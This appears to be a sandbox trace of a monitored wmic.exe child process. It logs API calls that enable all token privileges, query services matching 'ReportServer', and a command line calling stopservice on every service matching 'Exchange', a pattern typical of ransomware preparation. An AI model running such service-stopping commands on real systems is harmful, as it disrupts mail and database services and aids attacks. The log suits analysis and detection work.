malloc (_Size=0x38) returned 0x351bc58 [0308.474] malloc (_Size=0x38) returned 0x351bc98 [0308.474] malloc (_Size=0x24) returned 0x351bcd8 [0308.474] free (_Block=0x351bbf8) [0308.475] free (_Block=0x351bbb8) [0308.475] free (_Block=0x351bb78) [0308.475] free (_Block=0x351bb48) [0308.475] free (_Block=0x351ba88) [0308.475] free (_Block=0x351ba48) [0308.475] IUnknown:Release (This=0x31f05a0) returned 0x0 [0308.475] free (_Block=0x351bb18) [0308.475] free (_Block=0x351bad8) [0308.475] free (_Block=0x351ba08) [0308.475] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*="PauseService", ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x31c6ab8) returned 0x0 [0308.475] lstrlenW (lpString="PauseService") returned 12 [0308.475] lstrlenW (lpString="stopservice") returned 11 [0308.475] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0308.475] IUnknown:Release (This=0x31c6ab8) returned 0x0 [0308.475] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*="ResumeService", ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x31c6ab8) returned 0x0 [0308.475] lstrlenW (lpString="ResumeService") returned 13 [0308.475] lstrlenW (lpString="stopservice") returned 11 [0308.475] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0308.475] IUnknown:Release (This=0x31c6ab8) returned 0x0 [0308.475] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*="InterrogateService", ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x31c6ab8) returned 0x0 [0308.475] lstrlenW (lpString="InterrogateService") returned 18 [0308.476] lstrlenW (lpString="stopservice") returned 11 [0308.476] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0308.476] IUnknown:Release (This=0x31c6ab8) returned 0x0 [0308.476] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*="UserControlService", ppInSignature=0x30adb5c*=0x31f05a0, ppOutSignature=0x30adb58*=0x31f3058) returned 0x0 [0308.476] lstrlenW (lpString="UserControlService") returned 18 [0308.476] lstrlenW (lpString="stopservice") returned 11 [0308.476] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0308.476] IUnknown:Release (This=0x31f05a0) returned 0x0 [0308.476] IUnknown:Release (This=0x31f3058) returned 0x0 [0308.476] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*="Create", ppInSignature=0x30adb5c*=0x31f05a0, ppOutSignature=0x30adb58*=0x31f5028) returned 0x0 [0308.477] lstrlenW (lpString="Create") returned 6 [0308.477] lstrlenW (lpString="stopservice") returned 11 [0308.477] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0308.477] IUnknown:Release (This=0x31f05a0) returned 0x0 [0308.477] IUnknown:Release (This=0x31f5028) returned 0x0 [0308.477] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*="Change", ppInSignature=0x30adb5c*=0x31f05a0, ppOutSignature=0x30adb58*=0x31f4da8) returned 0x0 [0308.477] lstrlenW (lpString="Change") returned 6 [0308.477] lstrlenW (lpString="stopservice") returned 11 [0308.477] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0308.477] IUnknown:Release (This=0x31f05a0) returned 0x0 [0308.477] IUnknown:Release (This=0x31f4da8) returned 0x0 [0308.477] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*="ChangeStartMode", ppInSignature=0x30adb5c*=0x31f05a0, ppOutSignature=0x30adb58*=0x31f31c8) returned 0x0 [0308.477] lstrlenW (lpString="ChangeStartMode") returned 15 [0308.477] lstrlenW (lpString="stopservice") returned 11 [0308.477] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0308.477] IUnknown:Release (This=0x31f05a0) returned 0x0 [0308.477] IUnknown:Release (This=0x31f31c8) returned 0x0 [0308.477] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*="Delete", ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x31c6ab8) returned 0x0 [0308.477] lstrlenW (lpString="Delete") returned 6 [0308.477] lstrlenW (lpString="stopservice") returned 11 [0308.478] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0308.478] IUnknown:Release (This=0x31c6ab8) returned 0x0 [0308.478] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*="GetSecurityDescriptor", ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x31f05a0) returned 0x0 [0308.478] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0308.478] lstrlenW (lpString="stopservice") returned 11 [0308.478] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0308.478] IUnknown:Release (This=0x31f05a0) returned 0x0 [0308.478] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*="SetSecurityDescriptor", ppInSignature=0x30adb5c*=0x31f05a0, ppOutSignature=0x30adb58*=0x31f3058) returned 0x0 [0308.478] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0308.478] lstrlenW (lpString="stopservice") returned 11 [0308.478] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0308.478] IUnknown:Release (This=0x31f05a0) returned 0x0 [0308.478] IUnknown:Release (This=0x31f3058) returned 0x0 [0308.478] IWbemClassObject:NextMethod (in: This=0x31f03a8, lFlags=0, pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0 | out: pstrName=0x30adb60*=0x0, ppInSignature=0x30adb5c*=0x0, ppOutSignature=0x30adb58*=0x0) returned 0x40005 [0308.478] IUnknown:Release (This=0x31f03a8) returned 0x0 [0308.479] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0308.479] lstrlenW (lpString="SET") returned 3 [0308.479] lstrlenW (lpString="call") returned 4 [0308.479] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0308.479] lstrlenW (lpString="CREATE") returned 6 [0308.479] lstrlenW (lpString="call") returned 4 [0308.480] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0308.480] free (_Block=0x3512a28) [0308.480] malloc (_Size=0x4) returned 0x351b1e8 [0308.480] lstrlenW (lpString="GET") returned 3 [0308.480] lstrlenW (lpString="call") returned 4 [0308.480] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0308.480] lstrlenW (lpString="LIST") returned 4 [0308.480] lstrlenW (lpString="call") returned 4 [0308.480] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0308.480] lstrlenW (lpString="ASSOC") returned 5 [0308.480] lstrlenW (lpString="call") returned 4 [0308.480] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0308.480] WbemLocator:IUnknown:AddRef (This=0x31948d8) returned 0x3 [0308.480] free (_Block=0x3511208) [0308.480] lstrlenW (lpString="") returned 0 [0308.480] lstrlenW (lpString="NQDPDE") returned 6 [0308.480] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0308.480] lstrlenW (lpString="NQDPDE") returned 6 [0308.480] malloc (_Size=0xe) returned 0x351ae28 [0308.480] lstrlenW (lpString="NQDPDE") returned 6 [0308.480] GetCurrentThreadId () returned 0x12d4 [0308.480] GetCurrentProcess () returned 0xffffffff [0308.480] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x30afc38 | out: TokenHandle=0x30afc38*=0x2f8) returned 1 [0308.480] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x30afc34 | out: TokenInformation=0x0, ReturnLength=0x30afc34) returned 0 [0308.480] malloc (_Size=0x118) returned 0x351ba08 [0308.480] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x351ba08, TokenInformationLength=0x118, ReturnLength=0x30afc34 | out: TokenInformation=0x351ba08, ReturnLength=0x30afc34) returned 1 [0308.480] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x351ba08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0308.481] free (_Block=0x351ba08) [0308.481] CloseHandle (hObject=0x2f8) returned 1 [0308.481] lstrlenW (lpString="GET") returned 3 [0308.481] lstrlenW (lpString="call") returned 4 [0308.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0308.481] lstrlenW (lpString="LIST") returned 4 [0308.481] lstrlenW (lpString="call") returned 4 [0308.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0308.481] lstrlenW (lpString="SET") returned 3 [0308.481] lstrlenW (lpString="call") returned 4 [0308.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0308.481] lstrlenW (lpString="CALL") returned 4 [0308.481] lstrlenW (lpString="call") returned 4 [0308.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0308.481] ??0CHString@@QAE@XZ () returned 0x30afbf8 [0308.481] GetCurrentThreadId () returned 0x12d4 [0308.481] malloc (_Size=0xc) returned 0x351ae40 [0308.481] malloc (_Size=0xc) returned 0x351ae58 [0308.481] malloc (_Size=0xc) returned 0x351ae70 [0308.481] malloc (_Size=0xc) returned 0x351ae88 [0308.481] malloc (_Size=0xc) returned 0x3519868 [0308.481] SysStringLen (param_1="\\\\") returned 0x2 [0308.481] SysStringLen (param_1="NQDPDE") returned 0x6 [0308.482] malloc (_Size=0xc) returned 0x351bd80 [0308.482] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0308.482] SysStringLen (param_1="\\") returned 0x1 [0308.482] malloc (_Size=0xc) returned 0x351bd68 [0308.482] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0308.482] SysStringLen (param_1="root\\cimv2") returned 0xa [0308.482] free (_Block=0x351bd80) [0308.482] free (_Block=0x3519868) [0308.482] free (_Block=0x351ae88) [0308.482] free (_Block=0x351ae70) [0308.482] free (_Block=0x351ae58) [0308.482] free (_Block=0x351ae40) [0308.482] malloc (_Size=0xc) returned 0x351bdf8 [0308.482] malloc (_Size=0xc) returned 0x351bfc0 [0308.482] malloc (_Size=0xc) returned 0x351beb8 [0308.482] WbemLocator:IWbemLocator:ConnectServer (in: This=0x31948d8, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x31f0df0) returned 0x0 [0308.492] free (_Block=0x351beb8) [0308.492] free (_Block=0x351bfc0) [0308.492] free (_Block=0x351bdf8) [0308.492] CoSetProxyBlanket (pProxy=0x31f0df0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0308.492] free (_Block=0x351bd68) [0308.492] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0308.492] ??0CHString@@QAE@XZ () returned 0x30afbf0 [0308.492] GetCurrentThreadId () returned 0x12d4 [0308.492] malloc (_Size=0x38) returned 0x351ba08 [0308.492] malloc (_Size=0x28) returned 0x351ba48 [0308.492] malloc (_Size=0x28) returned 0x351ba78 [0308.492] malloc (_Size=0x38) returned 0x351baa8 [0308.492] malloc (_Size=0x38) returned 0x351bae8 [0308.492] malloc (_Size=0x24) returned 0x351bb28 [0308.492] malloc (_Size=0xc) returned 0x351ae70 [0308.492] lstrlenA (lpString="") returned 0 [0308.493] malloc (_Size=0x2) returned 0x351b1f8 [0308.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x351b1f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0308.493] free (_Block=0x351b1f8) [0308.493] malloc (_Size=0x38) returned 0x351bb58 [0308.493] malloc (_Size=0x24) returned 0x351bb98 [0308.493] malloc (_Size=0xc) returned 0x351ae40 [0308.493] free (_Block=0x351ae70) [0308.493] IWbemServices:GetObject (in: This=0x31f0df0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x30afbc8*=0x0, ppCallResult=0x0 | out: ppObject=0x30afbc8*=0x31f03a8, ppCallResult=0x0) returned 0x0 [0308.547] malloc (_Size=0xc) returned 0x351ae58 [0308.548] IWbemClassObject:GetMethod (in: This=0x31f03a8, wszName="stopservice", lFlags=0, ppInSignature=0x30afbe4, ppOutSignature=0x30afbc4 | out: ppInSignature=0x30afbe4*=0x0, ppOutSignature=0x30afbc4*=0x31f37e0) returned 0x0 [0308.548] free (_Block=0x351ae58) [0308.548] IUnknown:Release (This=0x31f37e0) returned 0x0 [0308.548] IUnknown:Release (This=0x31f03a8) returned 0x0 [0308.549] ??0CHString@@QAE@XZ () returned 0x30afaa8 [0308.549] GetCurrentThreadId () returned 0x12d4 [0308.549] malloc (_Size=0xc) returned 0x351ae70 [0308.549] lstrlenA (lpString="") returned 0 [0308.549] malloc (_Size=0x2) returned 0x351b1f8 [0308.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x351b1f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0308.549] free (_Block=0x351b1f8) [0308.549] malloc (_Size=0xc) returned 0x351ae58 [0308.549] lstrlenA (lpString="") returned 0 [0308.549] malloc (_Size=0x2) returned 0x351b1f8 [0308.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x351b1f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0308.549] free (_Block=0x351b1f8) [0308.549] malloc (_Size=0xc) returned 0x351ae88 [0308.550] free (_Block=0x351ae58) [0308.550] malloc (_Size=0xc) returned 0x351ae58 [0308.550] lstrlenA (lpString="SELECT * FROM ") returned 14 [0308.550] malloc (_Size=0x1e) returned 0x351bbc8 [0308.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x351bbc8, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0308.550] free (_Block=0x351bbc8) [0308.550] malloc (_Size=0xc) returned 0x3519868 [0308.550] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0308.550] SysStringLen (param_1="Win32_Service") returned 0xd [0308.550] free (_Block=0x351ae58) [0308.550] malloc (_Size=0xc) returned 0x351ae58 [0308.550] malloc (_Size=0xc) returned 0x351c068 [0308.550] lstrlenA (lpString=" WHERE ") returned 7 [0308.550] malloc (_Size=0x10) returned 0x351c0c8 [0308.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x351c0c8, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0308.550] free (_Block=0x351c0c8) [0308.550] malloc (_Size=0xc) returned 0x351c080 [0308.550] SysStringLen (param_1=" WHERE ") returned 0x7 [0308.550] SysStringLen (param_1="name like '%%ReportServer%%'") returned 0x1c [0308.550] malloc (_Size=0xc) returned 0x351c098 [0308.550] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0308.550] SysStringLen (param_1=" WHERE name like '%%ReportServer%%'") returned 0x23 [0308.550] free (_Block=0x3519868) [0308.550] free (_Block=0x351c080) [0308.551] free (_Block=0x351c068) [0308.551] free (_Block=0x351ae58) [0308.551] malloc (_Size=0xc) returned 0x351c080 [0308.551] IWbemServices:ExecQuery (in: This=0x31f0df0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%ReportServer%%'", lFlags=48, pCtx=0x0, ppEnum=0x30afab4 | out: ppEnum=0x30afab4*=0x31f4190) returned 0x0 [0308.554] free (_Block=0x351c080) [0308.554] CoSetProxyBlanket (pProxy=0x31f4190, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0308.569] IEnumWbemClassObject:Next (in: This=0x31f4190, lTimeout=-1, uCount=0x1, apObjects=0x30afab0, puReturned=0x30afaa0 | out: apObjects=0x30afab0*=0x0, puReturned=0x30afaa0*=0x0) returned 0x1 [0309.435] IUnknown:Release (This=0x31f4190) returned 0x0 [0309.437] free (_Block=0x351c098) [0309.437] free (_Block=0x351ae88) [0309.437] free (_Block=0x351ae70) [0309.437] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0309.437] free (_Block=0x351ae40) [0309.437] free (_Block=0x351bb28) [0309.437] free (_Block=0x351bae8) [0309.437] free (_Block=0x351baa8) [0309.437] free (_Block=0x351ba78) [0309.437] free (_Block=0x351ba48) [0309.437] free (_Block=0x351bb98) [0309.437] free (_Block=0x351bb58) [0309.437] free (_Block=0x351ba08) [0309.437] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0309.437] GetCurrentThreadId () returned 0x12d4 [0309.437] ??0CHString@@QAE@PBG@Z () returned 0x30afc68 [0309.437] ??YCHString@@QAEABV0@PBG@Z () returned 0x30afc68 [0309.437] malloc (_Size=0x800) returned 0x351c110 [0309.437] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x351c110, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0309.438] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0309.438] malloc (_Size=0x1c) returned 0x351ba08 [0309.438] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x351ba08, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0309.438] __iob_func () returned 0x776f2608 [0309.438] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0309.438] __iob_func () returned 0x776f2608 [0309.438] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0309.438] free (_Block=0x351ba08) [0309.438] free (_Block=0x351c110) [0309.438] ??1CHString@@QAE@XZ () returned 0x1 [0309.438] WbemLocator:IUnknown:Release (This=0x31f0df0) returned 0x0 [0309.439] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0309.439] _kbhit () returned 0x0 [0309.442] free (_Block=0x351b1e8) [0309.442] free (_Block=0x351ac00) [0309.442] free (_Block=0x351ab28) [0309.442] free (_Block=0x351adf8) [0309.442] free (_Block=0x351adb0) [0309.442] free (_Block=0x351b058) [0309.442] free (_Block=0x351b1c0) [0309.442] free (_Block=0x3519da8) [0309.442] free (_Block=0x351b250) [0309.442] free (_Block=0x351ac48) [0309.442] free (_Block=0x3512da8) [0309.442] free (_Block=0x3510508) [0309.442] free (_Block=0x351bcd8) [0309.442] free (_Block=0x351ab10) [0309.442] free (_Block=0x351ae10) [0309.442] free (_Block=0x351bc98) [0309.442] free (_Block=0x351bc58) [0309.442] free (_Block=0x351aea0) [0309.442] free (_Block=0x351aeb8) [0309.442] free (_Block=0x351aed0) [0309.442] free (_Block=0x351bc28) [0309.442] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0309.442] free (_Block=0x351b0f8) [0309.443] free (_Block=0x351ac30) [0309.443] free (_Block=0x351b198) [0309.443] free (_Block=0x351ab58) [0309.443] free (_Block=0x351b208) [0309.443] free (_Block=0x351ac60) [0309.443] free (_Block=0x3512b88) [0309.443] free (_Block=0x35126b0) [0309.443] free (_Block=0x35126f8) [0309.443] free (_Block=0x3512740) [0309.443] free (_Block=0x351ae28) [0309.443] free (_Block=0x35127d8) [0309.443] free (_Block=0x35104f0) [0309.443] free (_Block=0x3512a48) [0309.443] free (_Block=0x35104d8) [0309.443] free (_Block=0x3512b28) [0309.443] free (_Block=0x35104a0) [0309.443] free (_Block=0x35104b8) [0309.443] free (_Block=0x3512918) [0309.443] free (_Block=0x3512930) [0309.443] free (_Block=0x35128e0) [0309.443] free (_Block=0x35128f8) [0309.444] free (_Block=0x3512950) [0309.444] free (_Block=0x3512968) [0309.444] free (_Block=0x3512988) [0309.444] free (_Block=0x35129a0) [0309.444] free (_Block=0x3512870) [0309.444] free (_Block=0x3512888) [0309.444] free (_Block=0x3512838) [0309.444] free (_Block=0x3512850) [0309.444] free (_Block=0x35128a8) [0309.444] free (_Block=0x35128c0) [0309.444] free (_Block=0x3512800) [0309.444] free (_Block=0x3512818) [0309.444] free (_Block=0x35127b0) [0309.444] free (_Block=0x3512788) [0309.444] free (_Block=0x351afd0) [0309.444] WbemLocator:IUnknown:Release (This=0x31948d8) returned 0x2 [0309.444] WbemLocator:IUnknown:Release (This=0x319ac28) returned 0x0 [0309.445] WbemLocator:IUnknown:Release (This=0x31948d8) returned 0x1 [0309.445] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0309.445] WbemLocator:IUnknown:Release (This=0x31948d8) returned 0x0 [0309.445] free (_Block=0x351acd8) [0309.445] free (_Block=0x351ad08) [0309.445] free (_Block=0x3512be8) [0309.445] free (_Block=0x351ad20) [0309.445] free (_Block=0x351aca8) [0309.445] free (_Block=0x3512d68) [0309.445] free (_Block=0x351abb8) [0309.445] free (_Block=0x351ac18) [0309.445] free (_Block=0x3512d28) [0309.445] free (_Block=0x351abd0) [0309.445] free (_Block=0x351abe8) [0309.445] free (_Block=0x3512a08) [0309.445] free (_Block=0x351ac78) [0309.445] free (_Block=0x351aba0) [0309.445] free (_Block=0x35129e8) [0309.446] free (_Block=0x351acf0) [0309.446] free (_Block=0x351ab70) [0309.446] free (_Block=0x3512bc8) [0309.446] free (_Block=0x351ad68) [0309.446] free (_Block=0x351ad80) [0309.446] free (_Block=0x3512b08) [0309.446] free (_Block=0x351acc0) [0309.446] free (_Block=0x351ad98) [0309.446] free (_Block=0x3512d48) [0309.446] free (_Block=0x3519838) [0309.446] free (_Block=0x351ad50) [0309.446] free (_Block=0x3512b68) [0309.446] free (_Block=0x351adc8) [0309.446] free (_Block=0x351ab88) [0309.446] free (_Block=0x3512ac8) [0309.446] free (_Block=0x351ade0) [0309.446] free (_Block=0x351ab40) [0309.446] free (_Block=0x3512d08) [0309.446] free (_Block=0x351ad38) [0309.446] free (_Block=0x351ac90) [0309.446] free (_Block=0x3512ae8) [0309.446] free (_Block=0x3519970) [0309.446] free (_Block=0x35198e0) [0309.446] free (_Block=0x3512aa8) [0309.447] free (_Block=0x35198f8) [0309.447] free (_Block=0x3519910) [0309.447] free (_Block=0x3512c88) [0309.447] free (_Block=0x3519880) [0309.447] free (_Block=0x3519958) [0309.447] free (_Block=0x3512ce8) [0309.447] free (_Block=0x3519940) [0309.447] free (_Block=0x35198b0) [0309.447] free (_Block=0x3512c48) [0309.447] free (_Block=0x3519988) [0309.447] free (_Block=0x35199a0) [0309.447] free (_Block=0x3512d88) [0309.447] free (_Block=0x3519898) [0309.447] free (_Block=0x3519928) [0309.447] free (_Block=0x3512c28) [0309.447] free (_Block=0x3519850) [0309.447] free (_Block=0x35199b8) [0309.447] free (_Block=0x3512a88) [0309.447] free (_Block=0x3519808) [0309.447] free (_Block=0x35198c8) [0309.447] free (_Block=0x3512a68) [0309.447] free (_Block=0x35197f0) [0309.447] free (_Block=0x3519820) [0309.448] free (_Block=0x3512b48) [0309.448] CoUninitialize () [0309.474] exit (_Code=0) [0309.474] free (_Block=0x351aee8) [0309.475] free (_Block=0x3511010) [0309.475] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0309.475] free (_Block=0x3510550) [0309.475] free (_Block=0x35127f0) [0309.475] free (_Block=0x3510ff0) [0309.475] free (_Block=0x3510fd0) [0309.475] free (_Block=0x3510fa0) [0309.475] free (_Block=0x3510f80) [0309.475] free (_Block=0x3510f50) [0309.475] free (_Block=0x3510f10) [0309.475] free (_Block=0x3510ef0) [0309.475] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0309.475] free (_Block=0x3512c68) Thread: id = 315 os_tid = 0xfa0 Thread: id = 316 os_tid = 0x103c Thread: id = 317 os_tid = 0x1070 Thread: id = 318 os_tid = 0x1044 Process: id = "31" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0xd856000" os_pid = "0xff8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice" cur_dir = 